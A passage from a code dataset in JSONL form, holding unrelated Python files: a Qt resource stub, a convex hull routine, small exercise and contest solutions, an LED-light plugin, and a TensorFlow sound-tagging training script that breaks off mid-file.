x6d\\x66\\\n\\x00\\x00\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\xb5\\\n\\x00\\x00\\x01\\x78\\x7f\\x3c\\x95\\x96\\\n\\x00\\x00\\x01\\x6a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x35\\xae\\\n\\x00\\x00\\x01\\x78\\x7f\\x3f\\x55\\x08\\\n\\x00\\x00\\x01\\x9a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x42\\x68\\\n\\x00\\x00\\x01\\x78\\x7f\\x3f\\xc9\\xb2\\\n\\x00\\x00\\x01\\x82\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x3b\\xbb\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x02\\x37\\\n\\x00\\x00\\x01\\xb2\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x49\\x0a\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x49\\xa6\\\n\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xed\\x7a\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x85\\xf9\\\n\\x00\\x00\\x01\\x3a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x28\\x77\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\xb9\\xcf\\\n\\x00\\x00\\x01\\x52\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x2f\\x16\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\xf1\\x12\\\n\\x00\\x00\\x00\\xce\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x06\\x69\\\n\\x00\\x00\\x01\\x78\\x7f\\x41\\x25\\xef\\\n\\x00\\x00\\x01\\x22\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x21\\xc4\\\n\\x00\\x00\\x01\\x78\\x7f\\x41\\x61\\x79\\\n\\x00\\x00\\x01\\x04\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x15\\x65\\\n\\x00\\x00\\x01\\x78\\x7f\\xf2\\x13\\xac\\\n\\x00\\x00\\x00\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xf4\\x1c\\\n\\x00\\x00\\x01\\x78\\x7f\\xf2\\xd8\\x54\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"operepo/ope","sub_path":"client_tools/svc/lock_screen_widget_qrc.py","file_name":"lock_screen_widget_qrc.py","file_ext":"py","file_size_in_byte":360215,"program_lang":"python","lang":"ja","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"26070822862","text":"from operator import itemgetter\nimport math\n\ndef arg(_next, cur, prev) -> float:\n if _next == cur:\n return math.inf\n\n dx0 = _next[0] - cur[0]\n dy0 = _next[1] - cur[1]\n dx1 = cur[0] - prev[0]\n dy1 = cur[1] - prev[1]\n num = dx0 * dx1 + dy0 * dy1\n den = math.sqrt((dx0 * dx0 + dy0 * dy0)* (dx1 * dx1 + dy1 * dy1))\n return math.acos(num / den)\n\ndef convex_hull(points: list[(int, int)]) -> list[(int, int)]:\n prev = min(points, key=itemgetter(0))\n cur = min(points, key=lambda pt: arg(pt, prev, (prev[0], prev[1] - 1)))\n ret = [prev, cur]\n while ret[0] != ret[-1]:\n n = min(points, key=lambda pt: arg(pt, ret[-1], ret[-2]))\n ret.append(n)\n return ret\n\ndef main():\n points = [(0, 0), (10, 10), (0, 10), (10, 0), (5, 5), (2, 2), (1, 3), (2, -20), (-1, 2)]\n ret = convex_hull(points)\n print(ret)\n\nif __name__ == '__main__':\n main()","repo_name":"ar90n/lab","sub_path":"sandbox/algorithm/math/convex_hull_jarvis.py","file_name":"convex_hull_jarvis.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"29023681586","text":"'''\nEscreva uma função com parâmetros chamada multiplo(x, y). \nEsta função deve receber dois números e retornar True se o primeiro for múltiplo do segundo número; a função retorna False caso contrário.\n'''\n\ndef multiplo(x, y):\n if (x % y == 0):\n return True\n else:\n return False\n\nprint(multiplo(5, 10))\nprint(multiplo(50, 10))","repo_name":"igorverse/CC8210-programacao-avancada-I","sub_path":"aulas_de_lab/aula5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38262534915","text":"#coding: utf-8\nimport os\nimport paddlehub as hub\n\n# 2、加载模型\nhumanseg = hub.Module(name='deeplabv3p_xception65_humanseg')\n\n# 3、获取文件列表\n# 图片文件的目录\npath = '/home/SENSETIME/zhangjunwei/data/zhangjw/project/AttentionedDeepPaint/koutu/imgs/'\n# 获取目录下的文件\nfiles = os.listdir(path)\nprint(\"file is: \",files)\n\n# 用来装图片的\nimgs = []\n# 拼接图片路径\nfor i in files:\n imgs.append(path + i)\n print(\"imgs is: \",imgs)\n#抠图\nresults = humanseg.segmentation(data={'image':imgs})","repo_name":"zhangjw19321/auto_paint","sub_path":"AttentionedDeepPaint/koutu/paddle_koutu.py","file_name":"paddle_koutu.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3434553650","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n if not head or not head.next:\n return head\n less_head, less_tail = None, None\n greater_head, greater_tail = None, None\n while head:\n if head.val < x:\n if not less_head:\n less_head = head\n less_tail = head\n else:\n less_tail.next = head\n less_tail = less_tail.next\n if greater_tail:\n greater_tail.next = head.next\n elif head.val >= x:\n if not greater_head:\n greater_head = head\n greater_tail = head\n else:\n greater_tail.next = head\n greater_tail = greater_tail.next\n head = head.next\n if less_tail:\n less_tail.next = greater_head\n return less_head\n return greater_head\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0086/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16795205115","text":"import blinkt\nfrom tallypi.webapp.light.base import AbstractLight\nimport logging\nimport inspect\n\nlogger = logging.getLogger('light')\n\nclass Light(AbstractLight):\n name = 'light'\n keyword = 'light'\n\n def __init__(self):\n blinkt.set_clear_on_exit(True)\n blinkt.clear()\n blinkt.show()\n\n def setColor(self, red, green, blue):\n blinkt.set_all(red, green, blue)\n blinkt.show()\n\n def getColor(self):\n r, g, b, brightness = blinkt.get_pixel(0)\n return r, g, b\n\n def setBrightness(self, percent):\n brightness = self.validateBrightness(percent)\n blinkt.set_brightness(brightness)\n blinkt.show()\n\n def getBrightness(self):\n r, g, b, brightness = blinkt.get_pixel(0)\n return brightness\n\n def shutdown(self):\n blinkt.clear()\n blinkt.show()\n\n # This is invoked when installed as a Bottle plugin\n def setup(self, app):\n logger.info(\"Loading Blinkt! pHat\")\n\n self.routes = app\n\n for other in app.plugins:\n if not isinstance(other, Light):\n continue\n if other.keyword == self.keyword:\n raise PluginError(\"Found another instance of the Blinkt! pHat driver running!\")\n\n self.test()\n\n # This is invoked within Bottle as part of each route when installed\n def apply(self, callback, context):\n conf = context.get('light') or {}\n keyword = conf.get('keyword', self.keyword)\n\n args = inspect.getargspec(callback)[0]\n if keyword not in args:\n return callback\n\n def wrapper(*args, **kwargs):\n kwargs[self.keyword] = self\n rv = callback(*args, **kwargs)\n return rv\n return wrapper\n\n # De-installation from Bottle as a plugin\n def close(self):\n self.shutdown()\n\nclass PluginError(Exception):\n pass\n\nPlugin = Light\n","repo_name":"deckerego/tally_pi","sub_path":"lib/tallypi/webapp/light/blinkt.py","file_name":"blinkt.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"72"} +{"seq_id":"3455694272","text":"#plugin example\nimport pprint\n\n\nclass Plugin:\n \"\"\" don't modify here \"\"\"\n def __init__(self, packets=[], current_row=0):\n self.packets = packets\n self.current_row = current_row\n print(\"Plugin loaded ...\")\n def run(self, istart=2500, istop=2574):\n print('current row')\n print(self.current_row)\n\n last_time = 0\n num_TC = 0\n total_size = 0\n num_TM = 0\n counter = {}\n for packet in self.packets[istart:istop]:\n header = packet['header']\n if header['service_type'] == 20 and header[\n 'service_subtype'] == 128:\n continue\n leng = header['raw_length']\n spid = header['SPID']\n extra = ''\n extra2 = ''\n if header['TMTC'] == 'TC':\n num_TC += 1\n leng = 0\n extra2 = ';'\n else:\n #if int(header['SPID']) not in :\n # continue\n total_size += header['raw_length']\n num_TM += 1\n apid = header['apid']\n if apid not in counter:\n counter[apid] = 0\n counter[apid] += header['raw_length']\n extra = ';'\n if spid == 54102:\n if header['SCET'] < last_time + 14:\n continue\n last_time = header['SCET']\n print('TM Total size,', total_size)\n print('APID, length')\n for key, value in counter.items():\n print('{}, {}'.format(key, value))\n print('Number of TM,', num_TM)\n print('Number of TC,', num_TC)\n","repo_name":"elastufka/stix-data-center-pipeline","sub_path":"stix/ui/plugins/packet_size_calculation.py","file_name":"packet_size_calculation.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73181055272","text":"#문제 해석 시작시간 : AP 2:45\n#N개의 동전을 가지고 있을 때, 이 동전들로 만들수 없는 가장 최소 금액을 판단하라\n\n\n\nimport itertools\nimport sys\n\nN = int(sys.stdin.readline())\ncoin = list(map(int,sys.stdin.readline().split()))\nlst = set()\nfor i in range(1,N+1):\n x = itertools.combinations(coin,i)\n for i in x:\n lst.add(sum(i))\n\ncheck = 1\nwhile True:\n if check not in lst:\n print(check)\n break\n else:\n check = check + 1\n","repo_name":"Younggil-kim/Algorithm_with_python","sub_path":"그리디/만들 수 없는 금액_314page.py","file_name":"만들 수 없는 금액_314page.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15155445679","text":"#!/usr/bin/env python3\nN = int(input())\ncolor = [int(input()) for _ in range(N)]\n\ns = sum(color)\nif s == 0 or s == N:\n print(-1)\n exit()\n\nli = [[0, 1][color[i - 2] == color[i - 1] == color[i]] for i in range(N)]\ns = max(map(len, (''.join(map(str, li)) * 2).split('0')))\nprint((s + 1) // 2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc024/B/3920082.py","file_name":"3920082.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"30679718125","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 19 23:57:27 2020\n\n@author: dcase\n\"\"\"\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport gzip\nimport os\nimport numpy as np\nimport pandas as pd\nimport oyaml as yaml\nimport random\nimport pickle as pk\nimport metrics\nimport tensorflow as tf\n#import keras\n#from keras.layers import Input, Dense, TimeDistributed\n#from keras.models import Model\n#from keras import regularizers\n#from keras.optimizers import Adam\nimport keras.backend as K\nfrom sklearn.preprocessing import StandardScaler\n#from autopool import AutoPool1D\nfrom models import CNN9_train,CRNN9_train,CNN7_train,CNN9_Res_train\nfrom functions import calculate_scalar_of_tensor,scale\n\nNUM_HOURS = 24\nNUM_DAYS = 7\nNUM_WEEKS = 52\n\n\n## HELPERS\n\ndef load_train_data(file_list, train_file_idxs, feature_dir):\n \n train_data = []\n for train_id in train_file_idxs:\n data_path = os.path.join(feature_dir, file_list[train_id][:-4]+'.npy')\n train_data.append(np.load(data_path))\n train_data = np.asarray(train_data)\n \n return train_data\n\ndef get_subset_split(annotation_data):\n \"\"\"\n Get indices for train and validation subsets\n\n Parameters\n ----------\n annotation_data\n\n Returns\n -------\n train_idxs\n valid_idxs\n\n \"\"\"\n\n # Get the audio filenames and the splits without duplicates\n data = annotation_data[['split', 'audio_filename', 'annotator_id']]\\\n .groupby(by=['split', 'audio_filename'], as_index=False)\\\n .min()\\\n .sort_values('audio_filename')\n\n train_idxs = []\n valid_idxs = []\n\n for idx, (_, row) in enumerate(data.iterrows()):\n if row['split'] == 'train':\n train_idxs.append(idx)\n # elif row['split'] == 'validate':\n elif row['split'] == 'validate' and row['annotator_id'] <= 0:\n # For validation examples, only use verified annotations\n valid_idxs.append(idx)\n\n return np.array(train_idxs), np.array(valid_idxs)\n\ndef gen_train_batch(train_data,train_meta,train_label,batch_size):\n\n num = train_data.shape[0]\n arr = np.arange(num)\n np.random.shuffle(arr)\n train_data = train_data[arr]\n train_label = train_label[arr]\n for index in range(0,len(train_data),batch_size): \n if (index+batch_size)<=(len(train_data)):\n excerpt = slice(index, index + batch_size)\n else:\n excerpt = slice(index,len(train_data))\n yield train_data[excerpt], train_meta[excerpt], train_label[excerpt]\n \ndef gen_val_batch(val_data, val_meta, batch_size):\n\n for index in range(0,len(val_data),batch_size): \n if (index+batch_size)<=(len(val_data)):\n excerpt = slice(index, index + batch_size)\n else:\n excerpt = slice(index,len(val_data))\n yield val_data[excerpt], val_meta[excerpt]\n\n\ndef get_file_targets(annotation_data, labels):\n \"\"\"\n Get file target annotation vector for the given set of labels\n\n Parameters\n ----------\n annotation_data\n labels\n\n Returns\n -------\n targets\n\n \"\"\"\n file_list = annotation_data['audio_filename'].unique().tolist()\n count_dict = {fname: {label: 0 for label in labels} for fname in file_list}\n\n for _, row in annotation_data.iterrows():\n fname = row['audio_filename']\n split = row['split']\n ann_id = row['annotator_id']\n\n # For training set, only use crowdsourced annotations\n if split == \"train\" and ann_id <= 0:\n continue\n\n # For validate and test sets, only use the verified annotation\n # if split != \"train\" :\n if split != \"train\" and ann_id != 0:\n continue\n\n for label in labels:\n count_dict[fname][label] += row[label + '_presence']\n\n targets = np.array([[1.0 if count_dict[fname][label] > 0 else 0.0 for label in labels]\n for fname in file_list])\n\n return targets\n\ndef generate_output_file(y_pred, file_idxs, results_dir, file_list, label_mode, taxonomy):\n \"\"\"\n Write the output file containing model predictions\n\n Parameters\n ----------\n y_pred\n file_idxs\n results_dir\n file_list\n label_mode\n taxonomy\n\n Returns\n -------\n\n \"\"\"\n output_path = os.path.join(results_dir, \"output.csv\")\n file_list = [file_list[idx] for idx in file_idxs]\n\n coarse_fine_labels = [[\"{}-{}_{}\".format(coarse_id, fine_id, fine_label)\n for fine_id, fine_label in fine_dict.items()]\n for coarse_id, fine_dict in taxonomy['fine'].items()]\n\n full_fine_target_labels = [fine_label for fine_list in coarse_fine_labels\n for fine_label in fine_list]\n coarse_target_labels = [\"_\".join([str(k), v])\n for k,v in taxonomy['coarse'].items()]\n\n with open(output_path, 'w') as f:\n csvwriter = csv.writer(f)\n\n # Write fields\n fields = [\"audio_filename\"] + full_fine_target_labels + coarse_target_labels\n csvwriter.writerow(fields)\n\n # Write results for each file to CSV\n for filename, y, in zip(file_list, y_pred):\n row = [filename]\n\n if label_mode == \"fine\":\n fine_values = []\n coarse_values = [0 for _ in range(len(coarse_target_labels))]\n coarse_idx = 0\n fine_idx = 0\n for coarse_label, fine_label_list in zip(coarse_target_labels,\n coarse_fine_labels):\n for fine_label in fine_label_list:\n if 'X' in fine_label.split('_')[0].split('-')[1]:\n # Put a 0 for other, since the baseline doesn't\n # account for it\n fine_values.append(0.0)\n continue\n\n # Append the next fine prediction\n fine_values.append(y[fine_idx])\n\n # Add coarse level labels corresponding to fine level\n # predictions. Obtain by taking the maximum from the\n # fine level labels\n coarse_values[coarse_idx] = max(coarse_values[coarse_idx],\n y[fine_idx])\n fine_idx += 1\n coarse_idx += 1\n\n row += fine_values + coarse_values\n\n else:\n # Add placeholder values for fine level\n row += [0.0 for _ in range(len(full_fine_target_labels))]\n # Add coarse level labels\n row += list(y)\n\n csvwriter.writerow(row)\n\n\n## DATA PREPARATION\n\ndef one_hot(idx, num_items):\n return [(0.0 if n != idx else 1.0) for n in range(num_items)]\n\n\ndef prepare_data(train_file_idxs, valid_file_idxs,\n latitude_list, longitude_list, week_list, day_list, hour_list,\n target_list, standardize=True):\n \"\"\"\n Prepare inputs and targets for MIL training using training and validation indices.\n Parameters\n ----------\n train_file_idxs\n valid_file_idxs\n latitude_list\n longitude_list\n week_list\n day_list\n hour_list\n embeddings\n target_list\n standardize\n Returns\n -------\n X_train\n y_train\n X_valid\n y_valid\n scaler\n \"\"\"\n\n\n X_train_loc = np.array([[[latitude_list[idx],\n longitude_list[idx]]]\n for idx in train_file_idxs])\n X_valid_loc = np.array([[[latitude_list[idx],\n longitude_list[idx]]]\n for idx in valid_file_idxs])\n\n X_train_time = np.array([\n [one_hot(week_list[idx] - 1, NUM_WEEKS) \\\n + one_hot(day_list[idx], NUM_DAYS) \\\n + one_hot(hour_list[idx], NUM_HOURS)]\n for idx in train_file_idxs])\n X_valid_time = np.array([\n [one_hot(week_list[idx] - 1, NUM_WEEKS) \\\n + one_hot(day_list[idx], NUM_DAYS) \\\n + one_hot(hour_list[idx], NUM_HOURS)]\n for idx in valid_file_idxs])\n\n X_train_cts = X_train_loc\n X_valid_cts = X_valid_loc\n\n y_train = np.array([target_list[idx] for idx in train_file_idxs])\n y_valid = np.array([target_list[idx] for idx in valid_file_idxs])\n\n if standardize:\n # Only standardize continuous valued inputs (embeddings + location)\n scaler = StandardScaler()\n scaler.fit(np.array([feat for feat_grp in X_train_cts for feat in feat_grp]))\n\n X_train_cts = np.array([scaler.transform(emb_grp) for emb_grp in X_train_cts])\n X_valid_cts = np.array([scaler.transform(emb_grp) for emb_grp in X_valid_cts])\n else:\n scaler = None\n\n # Concatenate all of the inputs\n X_train = np.concatenate((X_train_cts, X_train_time), axis=-1)\n X_valid = np.concatenate((X_valid_cts, X_valid_time), axis=-1)\n\n\n return X_train, y_train, X_valid, y_valid, scaler\n\n\n## MODEL TRAINING\n\n\ndef train(annotation_path, taxonomy_path, train_feature_dir, val_feature_dir,\n output_dir, load_checkpoint, load_checkpoint_path, \n exp_id, label_mode, \n batch_size=32, n_epochs=100, kernel_size=3, \n layer_depth = [64,128,256,512], chs = 1, max_ckpt = 20,\n lr=1e-3, hidden_layer_size=256, snapshot = 5,\n num_hidden_layers=1, standardize=True,\n timestamp=None):\n \"\"\"\n Train and evaluate a MIL MLP model.\n Parameters\n ----------\n annotation_path\n emb_dir\n output_dir\n label_mode\n batch_size\n num_epochs\n patience\n learning_rate\n hidden_layer_size\n l2_reg\n standardize\n timestamp\n random_state\n\n Returns\n -------\n \"\"\"\n\n\n # Load annotations and taxonomy\n print(\"* Loading dataset.\")\n annotation_data = pd.read_csv(annotation_path).sort_values('audio_filename')\n with open(taxonomy_path, 'r') as f:\n taxonomy = yaml.load(f, Loader=yaml.Loader)\n\n annotation_data_trunc = annotation_data[['audio_filename',\n 'latitude',\n 'longitude',\n 'week',\n 'day',\n 'hour']].drop_duplicates()\n file_list = annotation_data_trunc['audio_filename'].to_list()\n latitude_list = annotation_data_trunc['latitude'].to_list()\n longitude_list = annotation_data_trunc['longitude'].to_list()\n week_list = annotation_data_trunc['week'].to_list()\n day_list = annotation_data_trunc['day'].to_list()\n hour_list = annotation_data_trunc['hour'].to_list()\n\n full_fine_target_labels = [\"{}-{}_{}\".format(coarse_id, fine_id, fine_label)\n for coarse_id, fine_dict in taxonomy['fine'].items()\n for fine_id, fine_label in fine_dict.items()]\n fine_target_labels = [x for x in full_fine_target_labels\n if x.split('_')[0].split('-')[1] != 'X']\n coarse_target_labels = [\"_\".join([str(k), v])\n for k,v in taxonomy['coarse'].items()]\n\n print(\"* Preparing training data.\")\n\n # For fine, we include incomplete labels in targets for computing the loss\n fine_target_list = get_file_targets(annotation_data, full_fine_target_labels)\n coarse_target_list = get_file_targets(annotation_data, coarse_target_labels)\n train_file_idxs, valid_file_idxs = get_subset_split(annotation_data)\n\n if label_mode == \"fine\":\n target_list = fine_target_list\n labels = fine_target_labels\n num_classes = len(labels)\n y_true_num = len(full_fine_target_labels)\n elif label_mode == \"coarse\":\n target_list = coarse_target_list\n labels = coarse_target_labels\n num_classes = len(labels)\n y_true_num = num_classes\n else:\n raise ValueError(\"Invalid label mode: {}\".format(label_mode))\n\n \n\n\n X_train_meta, y_train, X_valid_meta, y_valid_meta, scaler \\\n = prepare_data(train_file_idxs, valid_file_idxs,\n latitude_list, longitude_list,\n week_list, day_list, hour_list,\n target_list, standardize=standardize)\n \n print('X_train meta shape', X_train_meta.shape)\n print('y_train shape', y_train.shape)\n print('X_valid_meta shape', X_valid_meta.shape)\n print('y_valid shape', y_valid_meta.shape)\n \n meta_dims = X_train_meta.shape[2]\n \n \n X_train = load_train_data(file_list, train_file_idxs, train_feature_dir)\n X_valid = load_train_data(file_list, valid_file_idxs, val_feature_dir)\n _, frames, bins = X_train.shape\n print('X_train shape', X_train.shape)\n print('X_valid shape', X_valid.shape)\n \n (mean_train, std_train) = calculate_scalar_of_tensor(np.concatenate(X_train,axis=0))\n \n \n model = CNN9_Res_train(kernel_size,layer_depth,num_classes,hidden_layer_size)\n\n if not timestamp:\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n model_path = os.path.join(output_dir, 'exp'+exp_id)\n\n if scaler is not None:\n scaler_path = os.path.join(model_path, 'stdizer.pkl')\n with open(scaler_path, 'wb') as f:\n pk.dump(scaler, f)\n\n if label_mode == \"fine\":\n full_coarse_to_fine_terminal_idxs = np.cumsum(\n [len(fine_dict) for fine_dict in taxonomy['fine'].values()])\n incomplete_fine_subidxs = [len(fine_dict) - 1 if 'X' in fine_dict else None\n for fine_dict in taxonomy['fine'].values()]\n coarse_to_fine_end_idxs = np.cumsum([len(fine_dict) - 1 if 'X' in fine_dict else len(fine_dict)\n for fine_dict in taxonomy['fine'].values()])\n\n # Create loss function that only adds loss for fine labels for which\n # the we don't have any incomplete labels\n def masked_loss(y_true, y_pred):\n loss = None\n for coarse_idx in range(len(full_coarse_to_fine_terminal_idxs)):\n true_terminal_idx = full_coarse_to_fine_terminal_idxs[coarse_idx]\n true_incomplete_subidx = incomplete_fine_subidxs[coarse_idx]\n pred_end_idx = coarse_to_fine_end_idxs[coarse_idx]\n\n if coarse_idx != 0:\n true_start_idx = full_coarse_to_fine_terminal_idxs[coarse_idx-1]\n pred_start_idx = coarse_to_fine_end_idxs[coarse_idx-1]\n else:\n true_start_idx = 0\n pred_start_idx = 0\n\n if true_incomplete_subidx is None:\n true_end_idx = true_terminal_idx\n\n sub_true = y_true[:, true_start_idx:true_end_idx]\n sub_pred = y_pred[:, pred_start_idx:pred_end_idx]\n\n else:\n # Don't include incomplete label\n true_end_idx = true_terminal_idx - 1\n true_incomplete_idx = true_incomplete_subidx + true_start_idx\n assert true_end_idx - true_start_idx == pred_end_idx - pred_start_idx\n assert true_incomplete_idx == true_end_idx\n\n # 1 if not incomplete, 0 if incomplete\n mask = K.expand_dims(1 - y_true[:, true_incomplete_idx])\n\n # Mask the target and predictions. If the mask is 0,\n # all entries will be 0 and the BCE will be 0.\n # This has the effect of masking the BCE for each fine\n # label within a coarse label if an incomplete label exists\n sub_true = y_true[:, true_start_idx:true_end_idx] * mask\n sub_pred = y_pred[:, pred_start_idx:pred_end_idx] * mask\n\n if loss is not None:\n loss += K.sum(K.binary_crossentropy(sub_true, sub_pred))\n else:\n loss = K.sum(K.binary_crossentropy(sub_true, sub_pred))\n\n return loss\n \n loss_func = masked_loss\n else:\n \n def unmasked_loss(y_true, y_pred):\n \n loss = None\n loss = K.sum(K.binary_crossentropy(y_true, y_pred))\n return loss\n \n loss_func = unmasked_loss\n\n ### placeholder\n x = tf.placeholder(tf.float32,shape=[None,frames,bins,chs],name='x')\n meta_x = tf.placeholder(tf.float32,shape=[None,meta_dims],name='meta_x')\n y = tf.placeholder(tf.float32,shape=[None,y_true_num],name='y')\n is_training = tf.placeholder(tf.bool,shape=None,name='is_training')\n \n ### net output\n output = model.forward(input_tensor=x,input_meta=meta_x,is_training=is_training)\n sigmoid_output = tf.nn.sigmoid(output,name='sigmoid_output')\n loss = loss_func(y,sigmoid_output)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) \n learning_rate = tf.Variable(float(lr), trainable=False, dtype=tf.float32)\n learning_rate_decay_op = learning_rate.assign(learning_rate * 0.9)\n with tf.control_dependencies(update_ops): \n# train_op = tf.train.MomentumOptimizer(learning_rate=lr,momentum=momentum).minimize(loss)\n train_op = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss) \n \n \n ### start session\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n saver = tf.train.Saver(max_to_keep=max_ckpt)\n sess=tf.Session(config=config)\n sess.run(tf.global_variables_initializer())\n if load_checkpoint:\n saver.restore(sess,load_checkpoint_path)\n \n \n ### tensorboard summary\n\n train_summary_dir = os.path.join(model_path, 'summaries', 'train')\n train_summary_writer = tf.summary.FileWriter(train_summary_dir,sess.graph) \n \n loss_all=tf.placeholder(tf.float32,shape=None,name='loss_all')\n\n tf.add_to_collection(\"loss\", loss_all)\n\n loss_summary = tf.summary.scalar('loss', loss_all)\n\n \n val_summary_dir = os.path.join(model_path, 'summaries', 'val')\n val_micro_auprc_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'micro_auprc'), sess.graph)\n val_macro_auprc_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'macro_auprc'), sess.graph)\n val_val_micro_F1score_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'micro_F1score'), sess.graph)\n val_summary = tf.placeholder(tf.float32,shape=None,name='loss_all')\n tf.add_to_collection(\"val_summary\", val_summary)\n val_summary_op = tf.summary.scalar('val_summary', val_summary)\n\n ### train loop\n print(\"* Training model.\")\n class_auprc_dict = {}\n for epoch in range(n_epochs):\n train_loss = 0 ; n_batch = 0 \n for X_train_batch, X_meta_batch, y_train_batch in gen_train_batch(X_train, X_train_meta, y_train, batch_size):\n \n X_meta_batch = X_meta_batch.reshape(-1,meta_dims)\n X_train_batch = scale(X_train_batch,mean_train,std_train)\n X_train_batch = X_train_batch.reshape(-1,frames,bins,chs)\n _,train_loss_batch = sess.run([train_op,loss],\n feed_dict={x:X_train_batch, meta_x:X_meta_batch, y:y_train_batch, is_training:True})\n train_loss += train_loss_batch ; n_batch += 1\n train_loss = train_loss/n_batch\n train_summary_op = tf.summary.merge([loss_summary])\n train_summaries = sess.run(train_summary_op,feed_dict={loss_all:train_loss})\n train_summary_writer.add_summary(train_summaries, epoch)\n \n print(\"step %d\" %(epoch))\n print(\" train loss: %f\" % (train_loss))\n \n pre = []\n if ((epoch+1) % snapshot == 0 and epoch > 0) or epoch == n_epochs-1:\n sess.run(learning_rate_decay_op)\n \n for val_data_batch, val_meta_batch in gen_val_batch(X_valid, X_valid_meta, batch_size):\n \n val_meta_batch = val_meta_batch.reshape(-1,meta_dims)\n val_data_batch = scale(val_data_batch,mean_train,std_train)\n val_data_batch = val_data_batch.reshape(-1,frames,bins,chs) \n prediction = sess.run(sigmoid_output, feed_dict={x:val_data_batch, \n meta_x: val_meta_batch, is_training:False})\n pre.extend(prediction)\n # print(len(pre))\n generate_output_file(pre, valid_file_idxs, model_path, file_list, label_mode, taxonomy)\n submission_path = os.path.join(model_path, \"output.csv\")\n df_dict = metrics.evaluate(prediction_path=submission_path,annotation_path=annotation_path,\n yaml_path=taxonomy_path,mode=label_mode) \n val_micro_auprc,eval_df = metrics.micro_averaged_auprc(df_dict,return_df=True) \n val_macro_auprc,class_auprc = metrics.macro_averaged_auprc(df_dict,return_classwise=True)\n thresh_idx_05 = (eval_df['threshold']>=0.5).nonzero()[0][0]\n val_micro_F1score = eval_df['F'][thresh_idx_05]\n \n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_micro_auprc})\n val_micro_auprc_summary_writer.add_summary(val_summaries, epoch)\n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_macro_auprc})\n val_macro_auprc_summary_writer.add_summary(val_summaries, epoch)\n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_micro_F1score})\n val_val_micro_F1score_summary_writer.add_summary(val_summaries, epoch)\n class_auprc_dict['class_auprc_'+str(epoch)] = class_auprc\n print('official')\n print('micro',val_micro_auprc)\n print('micro_F1',val_micro_F1score)\n print('macro',val_macro_auprc)\n \n print('-----save:{}-{}'.format(os.path.join(model_path,'ckeckpoint','model'), epoch))\n saver.save(sess, os.path.join(model_path,'ckeckpoint','model'), global_step=epoch)\n\n \n np.save(os.path.join(model_path,'class_auprc_dict.npy'),class_auprc_dict)\n sess.close()\n\n\n\n\n\nif __name__ == '__main__':\n \n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\" \n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" \n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--annotation_path\", default='/annotations.csv')\n parser.add_argument(\"--taxonomy_path\", 